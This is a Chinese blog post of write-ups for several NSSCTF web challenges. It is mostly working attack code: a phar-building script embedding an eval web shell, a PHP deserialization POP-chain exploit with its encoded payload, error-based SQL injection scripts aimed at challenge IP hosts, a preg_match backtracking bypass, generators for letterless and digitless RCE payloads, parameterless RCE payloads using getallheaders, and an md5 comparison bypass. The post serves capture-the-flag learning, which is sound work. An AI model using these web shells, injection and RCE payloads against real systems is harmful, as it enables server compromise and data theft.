NSSCTF web学习

已于 2022-09-30 15:35:15 修改
阅读量1.1k 收藏 6
点赞数 1
分类专栏: NSSCTF 文章标签: php
于 2022-09-30 15:34:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/127124379
版权

目录

[CISCN 2019华东南]Web11

[NISACTF 2022]bingdundun~

[NISACTF 2022]babyserialize

[NISACTF 2022]join-us

[NISACTF 2022]middlerce

[鹏城杯 2022]简单的php

[NSSCTF 2022 Spring Recruit]babyphp

[CISCN 2019华东南]Web11

打开看了一下没发现什么,但是网页上又Public IP,在页面上也发现了IP回显。

猜测是ssti,尝试一下。

还不知道过滤了什么,尝试一下过滤情况,发现并没有过滤。

刚开始使用了{if}标签来注入,但后来发现可以直接命令执行。

直接查看flag即可。(记得使用bp来注入,hackbar直接注入我一直没成功)

[NISACTF 2022]bingdundun~

简单的phar反序列化,没有任何过滤。

Phar反序列化脚本(本地可以直接实现用)

<?php

    $phar = new Phar(" shell.phar");

    $phar->startBuffering();

    $phar->setStub("<?php __HALT_COMPILER(); ?>");

    $phar->addFromString("test.php", '<?php @eval($_POST[feng]);?>');

    $phar->stopBuffering();

?>

访问本地后直接改后缀为zip上传即可。

[NISACTF 2022]babyserialize

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

存在waf,过滤了一些函数和符号。

发现可以直接从NISA类中的wakeup直接跳到Ilovetxw类中的toString,然后再利用return直接跳到NISA中的__invoke函数。

Exp:

<?php



class NISA{

    public $txw4ever = 'sYSTEM("nl f*");';

}

class Ilovetxw{

}

$a = new NISA();

$a->fun = new Ilovetxw();

$a->fun->su = $a;

echo urlencode(serialize($a));

paylaod:

O%3A4%3A%22NISA%22%3A2%3A%7Bs%3A8%3A%22txw4ever%22%3Bs%3A17%3A%22sYSTEM%28%22nl+%2Ff%2A%22%29%3B%22%3Bs%3A3%3A%22fun%22%3BO%3A8%3A%22Ilovetxw%22%3A1%3A%7Bs%3A2%3A%22su%22%3Br%3A1%3B%7D%7D

[NISACTF 2022]join-us

Join报错注入。

其中用到了无列名注入mid函数截取。

脚本:

import requests



url = 'http://1.14.71.254:28459/dl.php'

#payload = "1' || (select * from abc)#"#数据库

#payload = "1' || extractvalue(1,concat(0x07, (select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'), 0x07))#"#获取表名

# payload = "1' || extractvalue(1,concat(1, (select * from(select * from output a join output b)c), 3))#"#data列

#payload = "1' || extractvalue(1,concat(0x07, (select * from output), 0x07))#"#第一部分flag

payload = "1' || extractvalue(1,concat(0x07, (select mid(data,25) from output), 0x07))#"

data={

       "tt" : payload

}

r = requests.post(url=url,data=data)

print(r.text)

[NISACTF 2022]middlerce

首先利用回溯次数限制绕过preg_match,使其返回false。

之后发现eval无法回显数据,且echo函数被过滤,所以利用了短标签来绕过无法回显的问题。

脚本:

import requests



payload = '{"cmd":"?><?= `nl /fl*`?>", "#":"'+"#"*(1000000) + '"}'  #$换成特殊符号也可以

r = requests.post("http://1.14.71.254:28071/",data = {"letter":payload})

print(r.text)

[鹏城杯 2022]简单的php

这一题现在看来是挺简单的,没有函数过滤。

两个点,无字母数字命令执行和无参构造rce,一点一点讲解。

首先就是无字母数字命令执行:

无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_yu22x的博客-CSDN博客

代码:

<?php
error_reporting(0);
highlight_file(__FILE__);
$code=$_GET['code'];
if(preg_match('/[a-z0-9]/i',$code)){
    die('hacker');
}
eval($code);

取反:

<?php
$a=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

$b=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

echo '(~'.urlencode(~$a).')(~'.urlencode(~$b).');';

异或:

下边是yu师傅的脚本:

Php脚本:

<?php



/* author yu22x */



$myfile = fopen("or_rce.txt", "w");

$contents="";

for ($i=0; $i < 256; $i++) {

       for ($j=0; $j <256 ; $j++) {



              if($i<16){

                     $hex_i='0'.dechex($i);

              }

              else{

                     $hex_i=dechex($i);

              }

              if($j<16){

                     $hex_j='0'.dechex($j);

              }

              else{

                     $hex_j=dechex($j);

              }

              $preg = '/[0-9a-z]/i';//根据题目给的正则表达式修改即可

              if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){

                                   echo "";

    }

 

              else{

              $a='%'.$hex_i;

              $b='%'.$hex_j;

              $c=(urldecode($a)|urldecode($b));

              if (ord($c)>=32&ord($c)<=126) {

                     $contents=$contents.$c." ".$a." ".$b."\n";

              }

       }



}

}

fwrite($myfile,$contents);

fclose($myfile);

python脚本:

import requests
import urllib
from sys import *
import os


def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        f = open("or_rce.txt", "r")
        while True:
            t = f.readline()
            if t == "":
                break
            if t[0] == i:
                # print(i)
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = "(\"" + s1 + "\"|\"" + s2 + "\")"
    return (output)


while True:
    param = action(input("\n[+] your function:")) + action(input("[+] your command:")) + ";"
    print(param)

异或和或类似。

下边是无参rce:

思路就是通过没有参数的函数达到命令执行的目的。

end() - 将内部指针指向数组中的最后一个元素,并输出。

next() - 将内部指针指向数组中的下一个元素,并输出。

prev() - 将内部指针指向数组中的上一个元素,并输出。

reset() - 将内部指针指向数组中的第一个元素,并输出。

each() - 返回当前元素的键名和键值,并将内部指针向前移动。

current() -输出数组中的当前元素的值。

scandir()  //函数返回指定目录中的文件和目录的数组。

localeconv()   //返回一包含本地数字及货币格式信息的数组。

current()     //返回数组中的单元,默认取第一个值。

pos是current的别名

getcwd()      //取得当前工作目录

dirname()     //函数返回路径中的目录部分。

array_flip()  //交换数组中的键和值,成功时返回交换后的数组

array_rand()  //从数组中随机取出一个或多个单元

array_flip()和array_rand()配合使用可随机返回当前目录下的文件名

dirname(chdir(dirname()))配合切换文件路径

几种payload

eval(hex2bin(session_id(session_start())));

print_r(current(get_defined_vars()));&b=phpinfo();

eval(next(getallheaders()));

var_dump(getenv(phpinfo()));

print_r(scandir(dirname(getcwd()))); //查看上一级目录的文件

print_r(scandir(next(scandir(getcwd()))));//查看上一级目录的文件

本题可以利用getallheaders函数来构造。

getallheaders返回当前请求的所有请求头信息

system(current(getallheaders()));

直接可以达到命令执行的目的。

Payload

?code=[~%8c%86%8c%8b%9a%92][!%FF]([~%9c%8a%8d%8d%9a%91%8b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]()));

[NSSCTF 2022 Spring Recruit]babyphp

数组加md5弱比较绕过。

Payload:

a[]=1&b1[]=1&b2[]=2&c1=s214587387a&c2=s155964671a

f0njl
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
nssctf文件test
03-30
1
NSSCTF-Web安全入门-wp
网安小菜鸡
01-27 3129
NSSCTF-Web安全入门-wp
一些简单的NSSCTFweb wp(SPWU篇)
最新发布
2303_79513877的博客
03-17 686
另:若遇到===这样的强类型比较,方法一就失效了,方法二仍然有效,或者还可以使用软件fastcoll进行md5碰撞,生成两个字符串使得他们的md5值相同。方法一: 可以使用带0e开头的数字穿进行传递参数,因为php会将0e开头的数字转化为0,故此时md5值相等,而两个变量值不相等;方法二: 可以传递数组,如name[]=123,password[]=456,md5不能加密数组,故两个md5返回的都是null。由题查看根目录下文件,查看f…可以发现此时判断md5值是否一样用的是==,这是php的弱类型比较,
NSSCTF-CRYPTO WP
m0_65764670的博客
11-13 132
根据密文可发现都是由数字和前六个字母组成,和md5的特征符合,由32位16进制组成,那么直接解密即可。我们通过编码形式可以看出这是由核心价值观加密后的内容,我们直接利用网上的解码器直接解码。在密文后面我们看见了一个等号,那么就可以联想到base64,解密之后直接就解出了明文。根据题目标签可知,这是uuencode,直接放入里面解密即可。
NSSCTF reverse题目解析(详细版)持续更新
ZJPC007的博客
11-24 2445
附件是一个.py文件原代码的含义是将list[]数组进行操作得到一个key利用key和flag进行异或操作,得到16进制的result所以可以得到大致的逆向代码框架重点就是对以下语句进行逆向该语句的含义是keyhex()[2:]zfill(2)因此的到逆向语句这里要注意的就是16进制和字符间的转换int(string,16)的功能就是将16进制转为10进制因此得到完整的脚本。
NSSCTF-Crypto靶场练习---41-46WP
Sciurdae的博客
12-15 1009
求 P-1 和 Q-1 的lcm 最小公倍数实际上就是我们要的 phi了。第二行是base64码表,有 %3D,%2F,%2B 是Unicode编码,可以换成。要用工具,或者在线网站https://sagecell.sagemath.org/注意的是 z3中用的是Int类型,所以要求的c1和c2也要是int类型,原先。没有考什么,N可以直接分解,得到p和q。这样得出来的c1是 mpz类型的,所以要用int转换。都是迷惑的东西,别看,注意关键的pow就好。c1和c2再根据z3就可以算出F1和F2了。
NSSCTF实战:Apache HTTPD 多后缀解析漏洞
weixin_52270928的博客
05-17 499
Apache文件解析漏洞涉及到一个Apache解析文件的特性,Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别。那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为php文件进行解析。
NSSCTF
weixin_43896504的博客
07-22 2274
NSSCTF
NSSCTF web题记录
m0_64815693的博客
11-08 9233
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
nssctf web 入门(6)
qq_61988806的博客
04-17 1192
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
[陇剑杯 2021]之Misc篇(NSSCTF)刷题记录⑤
Aluxian_的博客
04-26 1861
[陇剑杯 2021]之Misc篇(NSSCTF)刷题记录⑤
[SWPUCTF 2021 新生赛]traditional
03-15
[SWPUCTF 2021 新生赛]traditional
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
NSSCTF2022部分WP
y2xsec的博客
11-02 578
NSSCTF部分题解
NSSCTF逆向题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-08 644
直接把key打印出来,然后整理一下result,让key和result进行异或。
NSSCTF Crypto靶场练习,31-40WP
Sciurdae的博客
12-12 953
说说知识点,p和q都是小明文攻击,因为e是2,且p的2次方明显小于n,所以都直接对P和Q开方就可以得到p,q了。根据hint,下一个是栅栏密码,要先提示信息 doyouknowfence删除,不然解不出来,而且这里用的是加密。维吉尼亚密码,网站嗦一下https://www.guballa.de/vigenere-solver。这样可以求出 n1和n2 的最大公约数,继而求出p1,再求 n2和n3 的最大公约数,求出p3。WP链接:https://www.nssctf.cn/note/set/2178。
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 961
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
NSSCTFWeb篇刷题记录(12)
Aluxian_的博客
05-23 1526
【代码】NSSCTFWeb篇刷题记录(12)
NSSCTF刷题记录
kindyyy的博客
03-13 723
NSSctf的刷题记录,有错误欢迎指正
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值